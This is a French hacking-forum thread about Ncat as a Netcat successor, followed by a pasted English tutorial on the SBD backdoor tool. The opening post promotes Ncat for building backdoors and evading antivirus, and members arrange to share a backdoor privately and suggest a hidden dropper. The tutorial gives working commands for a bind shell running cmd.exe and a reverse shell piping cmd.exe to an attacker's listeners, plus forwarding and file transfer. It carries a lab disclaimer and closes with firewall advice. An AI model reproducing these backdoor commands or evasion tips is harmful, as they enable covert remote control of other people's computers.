Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 16-08-2010 23:41:24

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Ncat, le successeur de Netcat/Cryptcat

Aujourd'hui, j'ai testé pour vous Ncat, le Netcat du 21ème siècle !

  .       .       
  \`-"'"-'/       
   } 6 6 {        
  ==. Y ,==       
    /^^^\  .      
   /     \  )     
  (  )-(  )/     _
  -""---""---   / 
 /   Ncat    \_/  
(     ____        
 \_.=|____E

Pour ceux qui ne connaissent pas Netcat, c'est le "couteau suisse de la connexion réseau" ; il permet d'établir simplement une connexion entre 2 hôtes, et il y a plein d'usages possibles :
- transfert de fichier
- messagerie instantanée
- export de résultats de commande
- exécution de programmes à distance
- terminal distant (la forme la plus simple de backdoor)
Je ne vais pas détailler ces exemple ici, je vois renvoie vers l'excellente page des tutos de Nico qui fera ca mieux que moi (et il y a plein d'autres ressources sur le net). On en a déjà parlé ici à quelques reprises, justement pour créer un backdoor simple :
--> Backdoor pour Noobz sous win
--> tuto backdoor en reverse/shell
--> Comment créer mon propre Backdoor ?

Ce programme très simple mais très puissant commence cependant à être vieux : la dernière version a été codée en 1996, et n'a plus vraiment été maintenue depuis. Il souffre en outre de quelques défauts :
- tout le trafic passe en clair, pas de gestion du chiffrement. Cryptcat règle le problème (Twofish), mais il oblige le chiffrement, ce qui l'empêche de communiquer avec autre chose qu'un autre Cryptcat...
- il ne supporte pas l'IPv6 (bon, ca OK on s'en fout un peu... pour l'instant)
- et surtout, il est détecté comme virus par plusieurs éditeurs, justement à cause de son utilisation pour des backdoor. Rendre Netcat indétecté est d'ailleurs un challenge récurrent (Veidam, si tu passes par ici... tongue)

C'est pour ca que je vais parler de Ncat. C'est une réimplémentation de Netcat par l'équipe d'insecure.org, ceux qui développent le scanner Nmap (une bonne référence, donc).
Du côté des avantages, on a :
- la syntaxe et toutes les fonctions de Netcat (quasiment, ils ont viré la fonction scanner de ports, parce qu'ils "préfèrent un autre programme pour ca"... sans blague big_smile)
- support de l'IPv6, de l'UDP et des connexions via un proxy
- support OPTIONNEL du SSL pour chiffrer le trafic (avec des options avancées de certificat pour ceux qui veulent)
- limitation d'accès (via liste blanche ou noire)
- développement actif, et il est pour l'instant indétectable par la plupart (sinon la totalité) des antivirus ! smile
- des fonctions uniques : un mode t'chat amélioré et le "connection brokering", pour connecter plusieurs machines derrière des NAT via un 3ème serveur
En bref, vraiment du tout bon ! Il a cependant un inconvénient selon moi : la version Windows est obligée de se trimballer ses 2 DLL [c]libeay32[/c] et [c]ssleay32[/c] (qui font ensemble 1.15 Mo, alors que Ncat fait 171 ko => 1,33 Mo sad), même si on ne fait pas de SSL sad Il y a sans doute moyen de recompiler sans le support du SSL, mais c'est pas top non plus. Mais bon, on ne peut pas tout avoir wink

C'est le genre de petit programme dont on n'a pas besoin jusqu'au jour où on se rend compte qu'il est indispensable ! big_smile Tout comme Netcat, les applications sont très nombreuses ; la première fois que je l'ai utilisé c'était pour ne pas passer par Megaupload pour transférer un fichier de 600 Mo... Et quand on veut faire un backdoor, c'est la façon la plus facile (et les options de chiffrement et de limitation d'accès rendent Ncat plus efficace que Netcat). Je suis en train de travailler sur ce genre de backdoor, mais assez évolué, pour tirer parti de toutes les fonctions de l'outil ; si vous êtes sages je vous donnerai les détails tongue

Quelques liens pour conclure :
--> La page officielle du projet
--> La page de téléchargements, pour la version Windows ; pour Linux, c'est fourni avec Nmap, utilisez la version SVN si votre distribution n'a pas de version récente (je peux donner les détails si quelqu'un veut)
--> La documentation, qui détaille toutes les fonctions du programme

Et vous, dans quel cadre vous utilisez Netcat/Ncat ? big_smile

PS : Spéciale dédicace à Veidam : tu peux utiliser Ncat/Netcat à la place de download.exe ou wget.exe, pour ton projet de backdoor wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-08-2010 00:02:35

NoCrash
Membre d'honneur
Inscription : 09-04-2009
Messages : 148

Re : Ncat, le successeur de Netcat/Cryptcat

Hum hum, un petit coup de jeune pour Netcat, drôlement intéressant tout ça.
Merci pour le lien Antares145

Hors Ligne

#3 17-08-2010 00:27:16

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Inscription : 13-01-2010
Messages : 449
Site Web

Re : Ncat, le successeur de Netcat/Cryptcat

Génial merci , une mine d'informations tout ca  big_smile


fete.gif

Hors Ligne

#5 17-08-2010 00:51:12

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Ncat, le successeur de Netcat/Cryptcat

Sympa merci pour l'info je vais tester la bête smile

antares145 a écrit :

Je suis en train de travailler sur ce genre de backdoor, mais assez évolué, pour tirer parti de toutes les fonctions de l'outil ; si vous êtes sages je vous donnerai les détails wink

je te mail demain pour participer wink

Hors Ligne

#6 17-08-2010 08:43:48

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : Ncat, le successeur de Netcat/Cryptcat

Cool merci Antarès j'avais plus rien à scripter en ce moment, j'ai déjà tout automatisé smile.

Je vais m'attaquer à la bête et me faire un joli petit script bash pour faire tourner tout ça .

Dernière modification par noireaude (17-08-2010 08:44:16)


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#7 17-08-2010 14:45:07

goliate
Membre Irremplaçable
Inscription : 06-12-2009
Messages : 1 413
Site Web

Re : Ncat, le successeur de Netcat/Cryptcat

Merci pour l'info on va voir sa alors.


só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Hors Ligne

#8 17-08-2010 23:02:55

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Ncat, le successeur de Netcat/Cryptcat

Antares145 mail partis a l'instant

[Edit Antares145] Mail reçu et répondu wink

Hors Ligne

#9 18-08-2010 11:21:40

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Ncat, le successeur de Netcat/Cryptcat

merci l'ami! un membre de la famille cat en plus donc. smile
Il y a aussi socat sinon.


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#10 15-11-2012 19:10:41

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Ncat, le successeur de Netcat/Cryptcat

Antares, tu veux dire qu'il est impératif que Ncat fonctionne avec ses deux DLL de 1.15 Mo sous Win ? c'est à dire que ce n'est pas optionnel ? même lorsqu'il s'agit de bricoler une backdoor il faut que les deux DLL suivent l’exécutable Ncat vers la cible ?

Hé, c'est dommage tous ces cadres sup de crack-wifi dans ce topic sont en retraite hmm

Hors Ligne

#11 15-11-2012 19:15:43

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Ncat, le successeur de Netcat/Cryptcat

Oué, dans sa version binaire Win32, les 2 DLL sont obligatoire sinon Ncat refuse de se lancer... Après, il est toujours possible de reprendre les sources et de les compiler sans le support du SSL et alors on peut s'en passer, mais dans l'option "facile" il faut se trimbaler les 2 libs hmm

On peut probablement empaqueter tout ça dans un .EXE auto-extractible, mais ça reste bancal...

Hors Ligne

#12 26-12-2012 20:01:33

inferno666
Membre
Inscription : 26-12-2012
Messages : 14

Re : Ncat, le successeur de Netcat/Cryptcat

Dans tout les cas ont peut toujours programmer un petit "dropper/downloader" qui planque tout sa dans Application Data et qui execute l'executable.
Mais bon 1,33 MO par principe c'est un peu trop gros à mon gout hmm

Hors Ligne

#13 21-04-2013 08:00:37

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : Ncat, le successeur de Netcat/Cryptcat

Voici un outil que je viens de découvrir nommé SBD ou Shadowinteger's BackDoor, c'est un clone de NetCat qui prend en charge ou non le chiffrement AES 128 pour Linux et Windows, développé par Michel Blomgren.
Backtrack > Maintaining Access > OS Backdoors > SBD (BT5)
Il y a un ptit tuto pour Linux montrant comment générer une clé ou bien celui de l'auteur:

1. Introduction

An article on http://www.secureit.co.il discussed the availability of sbd (Shadowinteger's Backdoor), available at http://www.cycom.se/dl/sbd. It is described as a ‘Netcatclone, designed to be portable and offer strong encryption’. It supports aes-128 encryption and is available on most platforms, including win32 and Linux. Let’s check out some possibilities, using simple examples.

Please note that all testing is done in a private test environment. The results are described in this paper using 127.0.0.1 addresses. This paper is solely for educational use and the techniques are only to be reproduced in a test environment. Do not use this information to cause harm to other computers and/or people.


2. Connecting to a remote server

The simplest example explains on how to establish a TCP connection to a remote server and issue some protocol commands. Specifying the ‘-c off’ switch disables the default built-in encryption of the sbd client.


D:\sbd-1.27\binaries>sbd -r 0 -l -p 100 -e cmd.exe

D:\sbd-1.27\binaries>sbd -c off www.radarhack.com 80
GET / HTTP/1.1

Date: Thu, 17 Jun 2004 18:38:03 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.0 Chili!Soft-ASP/3.6.2 mod_perl/1.26 mod
_throttle/3.1.2 PHP/4.3.1 FrontPage/4.0.4.3 mod_ssl/2.8.11 OpenSSL/0.9.6h
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

127
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>


3. Chatting

The next example shows how to use sbd as a ‘chat client’ and ‘server’. All the communications are by default encrypted by AES and preceded with a PREFIX (‘-P prefix’). By specifying the ‘-l’ switch, sbd is put in listing mode on TCP port 100 (‘-p 100’)

On the server side:

D:\sbd-1.27\binaries>sbd -P xxradar -l -p 100

demolisher: I the connector ....
I'm de receiver ....

On the client side:

D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100

I the connector ....
xxradar: I'm de receiver ....

From the moment the client disconnects, the server side will exit. In order to ‘respawn’ the server, specify the ‘-r seconds’ switch. The server will be listening again after the specified amount of time. This might prevent the backdoor from existing and prevent to reconnect. Specifying a time of 0 seconds, will respawn the server mmediately.

D:\sbd-1.27\binaries>sbd -r 8 f -P server -l -p 100

demolisher: test1
demolisher: test2

D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100

test1
^C

D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100

connect(): WSAECONNREFUSED

D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100

connect(): WSAECONNREFUSED
… after 8 seconds ….

D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100

test2
^C

D:\sbd-1.27\binaries>


4. Getting a command shell

Let’s get into something more ‘interesting’. If you want to setup an encrypted connection on neither what TCP port, providing you with a command shell? Here it is !

On the server side:

D:\sbd-1.27\binaries>sbd -r 0 -l -p 100 -e cmd.exe

On the server side:

D:\sbd-1.27\binaries>sbd 127.0.0.1 100

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

D:\sbd-1.27\binaries>date
date
The current date is: Thu 06/17/2004
Enter the new date: (mm-dd-yy)

Using the monitor switch ‘-m on’ on the server side, will display on the server side an echo of the communication.

On the server side:

D:\sbd-1.27\binaries>sbd -m on -r 0 -l -p 100 -e cmd.exe

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

D:\date
date
The current date is: Thu 06/17/2004
Enter the new date: (mm-dd-yy)

On the client side:

D:\sbd-1.27\binaries>sbd 127.0.0.1 100

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

D:\date
date
The current date is: Thu 06/17/2004
Enter the new date: (mm-dd-yy)



5. Creating a reverse shell

The previous example is quite simple, but you need to be able to connect to an open port on the server on which the backdoor is running. This will be often impossible, due to firewall configurations. Chances are much bigger, if we could make the shell connect to the outside (assuming the server can connect out for some services like SMTP, http, dns, ….) where our sbd client is listening.

First of all, create two listening sockets on the attacking client. The first one will allow to send commands to the backdoor.

D:\sbd-1.27\binaries>sbd -l -p 2000

dir

A different cmd shell will function as output channel.

D:\sbd-1.27\binaries>sbd -l -p 3000


  Volume in drive D is BACKUP
  Volume Serial Number is 584C-2AAD
  Directory of D:\
06/17/2004 09:58 PM <DIR> .
06/17/2004 09:58 PM <DIR> ..
06/17/2004 09:27 PM 15 backup.txt
08/23/2001 02:00 PM 114,688 calc.exe
06/17/2004 10:00 PM 20 command.txt
06/17/2004 10:01 PM 0 dump.txt
06/17/2004 09:25 PM 15 in.log

D:\>

Then run the following command on the server

D:\sbd-1.27\binaries>sbd 127.0.0.1 2000 | cmd.exe | sbd 127.0.0.1 3000

This command actually connects to port 2000 and will receive commands from the client, which are piped in the cmd.exe. The output is send back across another connection back to the attacker.



6. TCP connection forwarding

In the next example, a listening socket is setup that will forward the in client’s input to a next server. This might be a handy trick to forward and spoof an exploit. Note that the return data is only displayed at the server side of sbd. (You can create an additional pipe to return the info to the client).

On the server side:

D:\sbd-1.27\binaries>sbd -vv -l -p 90 | sbd -c off www.radarhack.com 80

listening on port 90
connect to 127.0.0.1:90 from 127.0.0.1:1700 (localhost)

HTTP/1.1 302 Found
Date: Sun, 20 Jun 2004 14:07:42 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.0 Chili!Soft-ASP/3.6.2 mod_perl/1.26 mod
_throttle/3.1.2 PHP/4.3.1 FrontPage/4.0.4.3 mod_ssl/2.8.11 OpenSSL/0.9.6h
Location: http://www.radarhack.com/error_docs/not_found.html
Connection: close
Content-Type: text/html; charset=iso-8859-1

On the client side:

D:\sbd-1.27\binaries>sbd 127.0.0.1 90

HEAD / HTTP/1.0



7. Logging to a file or transferring files

Logging to a file is as simple as illustrated in the next examples. (You must specify the < NUL >!)

On the server side:

D:\sbd-1.27\binaries>sbd -l -p 100 < NUL > in.log
D:\sbd-1.27\binaries>type in.log

This is a test!

On the client side:

D:\sbd-1.27\binaries>sbd 127.0.0.1 100

this is a test
^C

D:\sbd-1.27\binaries>

Copying files is illustrated in the next example (works also with executable files)

On the server side:

D:\sbd-1.27\binaries>sbd -l -p 100 < NUL > backup.txt
D:\sbd-1.27\binaries>type backup.txt

this is a test

D:\sbd-1.27\binaries>

On the client side:

D:\sbd-1.27\binaries>sbd 127.0.0.1 100 < in.log


8. Conclusion

After evaluating (or playing in other words), the tool seems very useful and easy to use. It contains (much) less features than netcat, although it offers build-in encryption, which can be useful to avoid IDS/IPS systems, although some will detect malicious behavior, if used on well-known ports. The example of the reverse shell should prove that a decent configuration of firewalls in the outbound direction is necessary. In the scenario that a Trojan can be installed on a webserver, it is very important to prevent that this server can connect back out of the network, resulting in a shell for the attacker.

If you feel that some important information is missing or mistakes are made, please contact me on   [email protected]


src. A small tutorial on SBD - PDF [radarhack.com]

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Un successeur au WRT54G ? par le dirdir
5 1331 11-01-2014 22:10:54 par le dirdir
26 34349 18-06-2013 18:43:17 par Furyo
2 1398 14-11-2012 13:56:47 par Spectre

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.041 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]